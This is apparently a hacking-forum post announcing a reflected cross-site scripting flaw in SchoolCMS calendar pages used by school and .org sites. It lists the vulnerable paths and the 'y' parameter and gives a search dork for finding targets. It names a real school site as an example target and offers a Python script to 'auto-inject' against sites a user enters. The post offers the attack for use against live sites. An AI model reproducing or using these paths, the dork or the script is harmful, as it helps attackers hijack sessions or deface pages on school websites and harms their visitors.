SchoolCMS software vulnerable to more XSS. Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites. Exploit: /old_core/cal/month.php?cid= /old_core/cal/day.php?catid= /old_core/cal/week.php?catid= The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue. Code: SELECT ALL #!/usr/bin/python import sys import webbrowser import urllib2      print "######################################" print "#SchoolCMS auto-XSS inject script    #" print "#Dork: inurl:/old_core/cal/month.php #" print "#Author: VipVince                    #" print "#Vendor: http://www.poweritschools.com      #" print "#                                    #" print "######################################"      print "XSS lies in y=parameter of the URL in the calender. (Year)" print "After dorking a site, Enter URL like: http://www.oaklandschoolsnj.org" print "Let the script do the rest Wink" payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=" site = raw_input('Enter site to XSS: ') inject = webbrowser.open(site+payload) raw_input("Press any key to exit ") Enjoy